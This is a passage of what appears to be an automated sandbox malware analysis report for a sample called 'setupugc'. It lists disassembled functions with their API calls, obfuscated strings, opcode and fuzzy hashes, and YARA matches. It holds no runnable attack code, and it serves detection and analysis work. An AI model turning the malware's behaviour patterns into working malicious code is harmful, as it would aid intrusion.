                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 3h8t0-08$3h8t0-08$a~V
                                            • API String ID: 0-2215303234
                                            • Opcode ID: 59fc2094abb6971543dedf36680e7526f3fcd353e88e686ebeee3253f199b2f1
                                            • Instruction ID: c3bf99cf3cdb36645ebec9a4397f172a503976805b5ab37f7f531e236bb8cd8a
                                            • Opcode Fuzzy Hash: 59fc2094abb6971543dedf36680e7526f3fcd353e88e686ebeee3253f199b2f1
                                            • Instruction Fuzzy Hash: A451C13296869A6FCB12CF708CC69DEBFBDEE42144B18819CE8856F142D6358D86C7D1
                                            Function 03260CE0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            APIs
                                            • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 03260D57
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: 3h8t0-08$3h8t0-08
                                            • API String ID: 1836367815-1947605396
                                            • Opcode ID: 05f289e7cceacb00d3bf08d8f93abf911c5d464ed4195f711ad78a47db4b9bde
                                            • Instruction ID: 20cfba4841f4cbe2da97140d52fc5a5abfda0a8ce8f3f95b840699914e2f04c1
                                            • Opcode Fuzzy Hash: 05f289e7cceacb00d3bf08d8f93abf911c5d464ed4195f711ad78a47db4b9bde
                                            • Instruction Fuzzy Hash: 43018475D1021C7ADB11EAE58C81DEFBB7CEF41694F048064FA146B240D6B45E468BB1
                                            Function 03260CDC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20threadwindowCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 597 3260cdc-3260d5b PostThreadMessageW 599 3260d5d-3260d67 597->599 600 3260d6a-3260d70 597->600 599->600
                                            APIs
                                            • PostThreadMessageW.USER32(3h8t0-08,00000111,00000000,00000000), ref: 03260D57
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID: 3h8t0-08$3h8t0-08
                                            • API String ID: 1836367815-1947605396
                                            • Opcode ID: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                                            • Instruction ID: ba9e7f4b9393d93de6ccf647bb5d84bdef5e8c87b7232408527b46f8167de9af
                                            • Opcode Fuzzy Hash: 135beeca1b74d19290d0d057e79e408ff938a006e35054ead9790b99f903ef45
                                            • Instruction Fuzzy Hash: 3AD0A722A5911965C31391E86C419BD7B7CED82555B0042F7ED04C0012F505455A1AE2
                                            Function 032739D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNELBASE(000007D0), ref: 03273AAB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Sleep
                                            • String ID: net.dll$wininet.dll
                                            • API String ID: 3472027048-1269752229
                                            • Opcode ID: 0f7f77bb92338009fa2588b866e44393b9f605d567c4954d1e679649aa6f151d
                                            • Instruction ID: 64db248acf289fe97a535f929055afe59ffed0ac24975930d165c5630c597757
                                            • Opcode Fuzzy Hash: 0f7f77bb92338009fa2588b866e44393b9f605d567c4954d1e679649aa6f151d
                                            • Instruction Fuzzy Hash: D2318EB5611705BBDB14DFA4C885FEBB7B8FB88700F144519E6596B240D6B0B680CBA4
                                            Function 0326F43A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 104COMMON
                                            Download Yara Rule
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0326F457
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Initialize
                                            • String ID: @J7<
                                            • API String ID: 2538663250-2016760708
                                            • Opcode ID: fbb8e10833201649dbf7e5b42cac319692a495d8b5c8bfe8f2987ca84faa50fe
                                            • Instruction ID: e8824dc2c7058c3b912cba666fe8c1e47f1043921cbcbf3c29f89ba0d68d9e3d
                                            • Opcode Fuzzy Hash: fbb8e10833201649dbf7e5b42cac319692a495d8b5c8bfe8f2987ca84faa50fe
                                            • Instruction Fuzzy Hash: BE3150B6A1060AAFDB00DFD8D8809EFB7B9FF88304B148559E505EB214D771EE458BA0
                                            Function 0326F440 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                            Download Yara Rule
                                            APIs
                                            • CoInitialize.OLE32(00000000), ref: 0326F457
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Initialize
                                            • String ID: @J7<
                                            • API String ID: 2538663250-2016760708
                                            • Opcode ID: 76a3af3732a29e338171fcef7dcbb828a9060cab0e95df65d22fa18f2d4e880e
                                            • Instruction ID: 32fe35308789e8a0bd9f12a90c0ec2893a0903c9f30ce3a9be5cc05678c0ccd9
                                            • Opcode Fuzzy Hash: 76a3af3732a29e338171fcef7dcbb828a9060cab0e95df65d22fa18f2d4e880e
                                            • Instruction Fuzzy Hash: 5D3130B6A1060AAFDB00DFD8D8809EFB7B9BF88304B148559E505EB214D775EE458BA0
                                            Function 03264470 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032644E2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                                            • Instruction ID: a9da30378bc8d5522192475125e9d94497b96811d03f6858bfed1b19008159ce
                                            • Opcode Fuzzy Hash: 695220c7de908a7325642339f6d976c34b7cf8201cc9d60be99d785a75aec0d5
                                            • Instruction Fuzzy Hash: C70121B9D1020EBBDF10EBE5DC42F9EB3B8AF44208F0445A5E9089B241F671E794CB91
                                            Function 032796C0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,0326826E,00000010,?,?,?,00000044,?,00000010,0326826E,?,?,?), ref: 03279723
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateInternalProcess
                                            • String ID:
                                            • API String ID: 2186235152-0
                                            • Opcode ID: 65d2a4bb970c2940134192fc3030f03d9d351a21f70adb79ba28bda70a3ee3fc
                                            • Instruction ID: 6f3c3633aaa04c5fb4a67ae201ae1ab497b988911e9f9f13a9be55b5c434a99d
                                            • Opcode Fuzzy Hash: 65d2a4bb970c2940134192fc3030f03d9d351a21f70adb79ba28bda70a3ee3fc
                                            • Instruction Fuzzy Hash: DD01D6B6210608BBCB44DF99DC81EEB77ADAF8C754F008208FA09E7240D670F951CBA4
                                            Function 03259BA0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03259BE5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: d4ba3f52c4ade0611846eaaf0d949db87c8fb3e4f396d54fe8caf1b9d214ba35
                                            • Instruction ID: 9dce8a52031e65b1b3c6e502812f0766d88740d0a5ccbbda6f216b452fa6c910
                                            • Opcode Fuzzy Hash: d4ba3f52c4ade0611846eaaf0d949db87c8fb3e4f396d54fe8caf1b9d214ba35
                                            • Instruction Fuzzy Hash: 23F0653739031436E320A6A9AC02FDBB28C9B80A61F140025FB1CEB1C0DAE1F58142E5
                                            Function 03264463 Relevance: 1.5, APIs: 1, Instructions: 37libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 032644E2
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Load
                                            • String ID:
                                            • API String ID: 2234796835-0
                                            • Opcode ID: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                                            • Instruction ID: 3249019843eaf2dc6bcd8223ccf29f6008b851a43ae0eb195995a972e648f629
                                            • Opcode Fuzzy Hash: 65f8a6c095fa10727bab02ecd6e11e6f0f6e72e2c6352eb367b5a389209ad39c
                                            • Instruction Fuzzy Hash: 39F0BB75E5010EABDF10DAD5DC41FDCB7B9EB4531CF0082D5E90C9B280E571DA588790
                                            Function 03259B9C Relevance: 1.5, APIs: 1, Instructions: 32threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 03259BE5
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateThread
                                            • String ID:
                                            • API String ID: 2422867632-0
                                            • Opcode ID: 3b59a628e2f3affdb7d13da3e051bb6c21431dfc43ddabfad4d4dd0b26490e6a
                                            • Instruction ID: b70de01e042a2384c6e588ad4615713cf95b99df928512f8257b8c7f05ae06a5
                                            • Opcode Fuzzy Hash: 3b59a628e2f3affdb7d13da3e051bb6c21431dfc43ddabfad4d4dd0b26490e6a
                                            • Instruction Fuzzy Hash: 2BE0923729031136E231A2A59C42FDBB65C9F84B51F140055F71CAF1C0DAE1B6C183A4
                                            Function 03279630 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,204889F0,00000007,00000000,00000004,00000000,03263CF2,000000F4), ref: 0327966C
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                                            • Instruction ID: 23e348a345ef9a5d795c1e4d2f351770f7b355ea249bda3fee13fcb607ed6ae7
                                            • Opcode Fuzzy Hash: 86d96a3a7410ab6ab211053b4fea2199c90ade22f87b5ad2487026e45bc71ae6
                                            • Instruction Fuzzy Hash: 39E06DB62007047BDA10EE59DC41FEB77ACEFC4710F008409FD08A7241DA71B9508BB4
                                            Function 032795E0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(03261979,?,0327571B,03261979,032755AF,0327571B,?,03261979,032755AF,00001000,?,?,00000000), ref: 0327961F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID:
                                            • API String ID: 1279760036-0
                                            • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                                            • Instruction ID: 9745ddd16c04c18dcbf92d250f9ce766c523193c15e20cf70f1c546e519ac570
                                            • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                                            • Instruction Fuzzy Hash: B9E06D752003047BDA10EE68DC41FAB37ACEFC5710F004408FD08AB241D670B95487B5
                                            Function 032682B0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?), ref: 032682DC
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 70bb55df6e06c9865b5c9752df4751d0a4ddc1d1fc42b2deb0a52a0e7238c953
                                            • Instruction ID: 75628eea30225f206b3a58c1816e02e38a4d7a721eec5fbbe2f3e94317f93022
                                            • Opcode Fuzzy Hash: 70bb55df6e06c9865b5c9752df4751d0a4ddc1d1fc42b2deb0a52a0e7238c953
                                            • Instruction Fuzzy Hash: 86E0867A26070427FB24EAA8DC49F66335C9F48624F1C4660FD1DDB2C5E578F5D18198
                                            Function 032682A9 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?), ref: 032682DC
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 40891b12b8834475ba51a7971b6d3493bd325ca51f184d1fa294e5a311afaf68
                                            • Instruction ID: 036f8759d3c4a897d65279070135e1f4f5d874b626ef5d6d91ea2e038639ebc3
                                            • Opcode Fuzzy Hash: 40891b12b8834475ba51a7971b6d3493bd325ca51f184d1fa294e5a311afaf68
                                            • Instruction Fuzzy Hash: 39E0207B45074117E71096A4DE4B75A3218AF04320F1C0654FC69DF1C7E17CD5C28358
                                            Function 03268098 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,03261C60,03277EEF,032755AF,03261C30), ref: 032680D3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: b447015c6537d15a4a50a52007dd2891604f811c61bc25540ec67603206767d1
                                            • Instruction ID: 4992e9515b1275b210e48083284e53367ad8e64543c2c28c340afc3d959fc5c7
                                            • Opcode Fuzzy Hash: b447015c6537d15a4a50a52007dd2891604f811c61bc25540ec67603206767d1
                                            • Instruction Fuzzy Hash: 3CE0C2792903012BF610E6A48C06F5A228C9F44251F054428BD0DDF2C1F9A0F64242A0
                                            Function 032680A0 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNELBASE(00008003,?,?,03261C60,03277EEF,032755AF,03261C30), ref: 032680D3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: ff2e638cd5ff3d4069bdd435054f1d908f263e726e7c6bd14b4122d16e218e7d
                                            • Instruction ID: 0b9cf9758d902482811c7cc7b085bd36fde61add5bf5f2db71c4c8cf7bd31754
                                            • Opcode Fuzzy Hash: ff2e638cd5ff3d4069bdd435054f1d908f263e726e7c6bd14b4122d16e218e7d
                                            • Instruction Fuzzy Hash: E0D05E796903043BF610E7E49C16F5A328C9F44665F054468BE0DDB2C1F9A5F6914165
                                            Function 0326834E Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?), ref: 032682DC
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, Offset: 03250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3250000_setupugc.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 06f463dce98fc71825ab6c41644de1236a71f8302d1a6e3cc725697dbdeb6a1c
                                            • Instruction ID: 93df5157ece93498c1277e0105e81e816215278fa890a4bcd6d620af89f509de
                                            • Opcode Fuzzy Hash: 06f463dce98fc71825ab6c41644de1236a71f8302d1a6e3cc725697dbdeb6a1c
                                            • Instruction Fuzzy Hash: 6DD0A77623588645E7209AACF4483EAB749EF4B7787580951E8299E9D8D123A0DA5088
                                            Function 03BC2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ca745f9b6788d853ce26805c60fd026cd08f2c1402b174276d1819c15dc03489
                                            • Instruction ID: b8a8b062b25c5b6c0bcb43810c2d01ca6cfa420e24a26d1e0efa2d43b70afe2b
                                            • Opcode Fuzzy Hash: ca745f9b6788d853ce26805c60fd026cd08f2c1402b174276d1819c15dc03489
                                            • Instruction Fuzzy Hash: 97B09B769015D5C5DE11E76046087177914A7D0705F19C4F5D2034642E4739C5D1E175

                                            Non-executed Functions

                                            Function 0397E089 Relevance: 56.5, Strings: 45, Instructions: 213COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3553899335.0000000003970000.00000040.00000800.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3970000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                            • API String ID: 0-3558027158
                                            • Opcode ID: 458e4f4b897d65c809780c96cfd8d54e8a5b67c8a66b0a3d843c4159f0d85bb7
                                            • Instruction ID: 6f18fb238be2ca275cf930eca20f192f38377c2f20e586a8f64814ec2b2fe156
                                            • Opcode Fuzzy Hash: 458e4f4b897d65c809780c96cfd8d54e8a5b67c8a66b0a3d843c4159f0d85bb7
                                            • Instruction Fuzzy Hash: 4F9150F04482988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE8905CB85
                                            Function 03973BD1 Relevance: 18.8, Strings: 15, Instructions: 51COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3553899335.0000000003970000.00000040.00000800.00020000.00000000.sdmp, Offset: 03970000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3970000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .$9~b{$<9<-$bsnb$b{z=$g+&8$g+&8$n{z-$n{z:$qs9a$stf:$wffz$wqs9$x9n~$z:wf
                                            • API String ID: 0-3228068659
                                            • Opcode ID: d4e036f92464fe02c1468838fa76788ba320a3352cc09423a0d35a3af1faef14
                                            • Instruction ID: 732500ea8815c14cfd92ebe1760c15d7649a13f148fb56c3fa0f035d42a24268
                                            • Opcode Fuzzy Hash: d4e036f92464fe02c1468838fa76788ba320a3352cc09423a0d35a3af1faef14
                                            • Instruction Fuzzy Hash: 062144B081468C8ACF14DF96D991AECBF71FB00348F208148D8446F3A4D7781A42CF8A
                                            Function 03BC2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: b40f0269e668e02b7c0f5cdb66d56f3e09578f01551bc1fab339345e2e2513dd
                                            • Instruction ID: a96603b0f418587de73624d623a854e9383fbda9353f08d2ad5eec9e22d9f1eb
                                            • Opcode Fuzzy Hash: b40f0269e668e02b7c0f5cdb66d56f3e09578f01551bc1fab339345e2e2513dd
                                            • Instruction Fuzzy Hash: 0651C9B6A10156BFCF24DB98889097EF7B8FF08209B1485FDE469DB641D274DE448BE0
                                            Function 03C32410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: a82687dcff8a26cca7b878bfeb46beda3e6703d243dfcc6dd8f1540e9832e054
                                            • Instruction ID: 67c768b7223e7ac7c94c05f90ebdf87f7a52fa9a1ef2ac855d0246dc7679e071
                                            • Opcode Fuzzy Hash: a82687dcff8a26cca7b878bfeb46beda3e6703d243dfcc6dd8f1540e9832e054
                                            • Instruction Fuzzy Hash: 6951C675A00645AECF30EE5CC89097EB7F9EF45204B44C8A9E4A6DB641E774EB4097A0
                                            Function 03BB7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                            Download Yara Rule
                                            Strings
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03BF4725
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03BF4655
                                            • ExecuteOptions, xrefs: 03BF46A0
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03BF4742
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 03BF46FC
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03BF4787
                                            • Execute=1, xrefs: 03BF4713
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 088b58560c7b4c7951d4a8881183ca31e4577fc5f356726cc1a3379bf4251f66
                                            • Instruction ID: ed1929a13fe526a251aa0fe1eb52f1a76a4527cc42c7ec059983d6a272145be7
                                            • Opcode Fuzzy Hash: 088b58560c7b4c7951d4a8881183ca31e4577fc5f356726cc1a3379bf4251f66
                                            • Instruction Fuzzy Hash: 6A51C535A003596EDB21EAA99C9AFFE77B8EF44308F0400F9D506EB191DFB19E458B50
                                            Function 03BCB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.3554064161.0000000003B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B50000, based on PE: true
                                            • Associated: 00000009.00000002.3554064161.0000000003C79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003C7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000009.00000002.3554064161.0000000003CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_3b50000_setupugc.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction ID: ffe393167ecf9bdf41bf8bc23dc87e8cca49b2cb3111322f246ed5c38c046ec4
                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction Fuzzy Hash: 6C818D74E652899ADF34CE68C8927AEFBA5EF45318F1C41FED861A7391C73498408B60
                                            Function 03BAF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
